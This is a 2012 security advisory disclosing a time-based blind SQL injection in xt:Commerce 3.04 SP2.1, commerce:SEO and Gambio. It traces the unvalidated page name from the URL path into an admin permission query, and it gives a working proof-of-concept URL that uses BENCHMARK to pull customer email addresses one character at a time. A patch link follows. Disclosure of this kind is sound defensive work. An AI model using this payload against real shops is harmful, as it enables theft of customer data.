xt:Commerce 3.04 SP2.1 - Blind SQL Injection

+---------------------------------+
| xt:Commerce <= v3.04 SP2.1      |
| commerce:SEO <= v2.1 CE         |
| Gambio <= v2.0.10 SP1.4         |
| Time Based Blind SQL Injection  |
+---------------------------------+

Author.............: Ralf Zimmermann 
Mail...............: info[AT]stoffline.com
Vendor Homepage....: http://www.xt-commerce.com/
Software Link......: http://www.xtc-load.de/2008/07/xtcommerce-v304-sp21/
Affected Version...: xt:Commerce <= v3.04 SP2.1, commerce:SEO <= v2.1 CE, Gambio <= v2.0.10 SP1.4
URL http://stoffline.com/golb/details-zur-sicherheitslucke-in-xtcommerce/ (german)
URL http://stoffline.com/golb/sicherheitslucke-in-xtcommerce/ (german)
Date...............: 12/06/2012

-----------------------------------------------------------
       Author will be not responsible for any damage.
-----------------------------------------------------------
I. DESCRIPTION
-----------------------------------------------------------

# we need to be logged in as a regular customer...

admin/backup.php
  18: require('includes/application_top.php');

admin/includes/application_top.php
  399: $current_page = split('\?', basename($_SERVER['PHP_SELF'])); $current_page = $current_page[0]; // for BadBlue(Win32) webserver compatibility
  # if you go to
  # http://127.0.0.1/xtc_304SP21/admin/backup.php/test.php?
  # $current_page = 'test.php' instead of 'backup.php' cause AcceptPathInfo from Apache passes the entire path

  486: $pagename = strtok($current_page, '.');
  # $pagename = 'test';

  487: if (!isset($_SESSION['customer_id'])) {
  488:  xtc_redirect(xtc_href_link(FILENAME_LOGIN));
  489: }
  # We need to be logged in but we walk through this checkpoint regardless of our customer status

  491: if (xtc_check_permission($pagename) == '0') {
  492:  xtc_redirect(xtc_href_link(FILENAME_LOGIN));
  493: }

admin/includes/functions/general.php
  110: function xtc_check_permission($pagename) {
  111:  if ($pagename != 'index') {
  112:   $access_permission_query = xtc_db_query("select ".$pagename." from ".TABLE_ADMIN_ACCESS." where customers_id = '".$_SESSION['customer_id']."'");
  113:   $access_permission = xtc_db_fetch_array($access_permission_query);
  114:
  115:   if (($_SESSION['customers_status']['customers_status_id'] == '0')&& ($access_permission[$pagename] == '1')) {
  116:    return true;
  117:   } else {
  118:    return false;
  119:   }
  120:  } else {
  121:   xtc_redirect(xtc_href_link(FILENAME_LOGIN));
  122:  }
  123: }
  # $pagename comes in the query with no validation
  # select test from admin_access where customer_id = 2

  # Every valid SQL query ends with a redirect to the login page.
  # We can use time based MySQL commands like Benchmark to exploit the vulnerability.
  # The PoC checks if the first character from the customers email adress is 'a'.
  # If so, the query will consume a lot of time e.G. 10 seconds, if not, we will directly redirected to the login page

-----------------------------------------------------------

II. PoC EXPLOIT
-----------------------------------------------------------
http://127.0.0.1/xtc_304SP21/admin/backup.php/IF((SELECT%20ASCII(SUBSTR(customers_email_address,1,1))%20FROM%20customers%20WHERE%20customers_id=1)=97,BENCHMARK(100000000,MD5(1)),1)--%20.php?
-----------------------------------------------------------

III. Solution:
-----------------------------------------------------------
Patches can be found here:
http://www.xtc-load.de/2012/06/wichtiges-security-update-fur-alle-xtc-forks/
-----------------------------------------------------------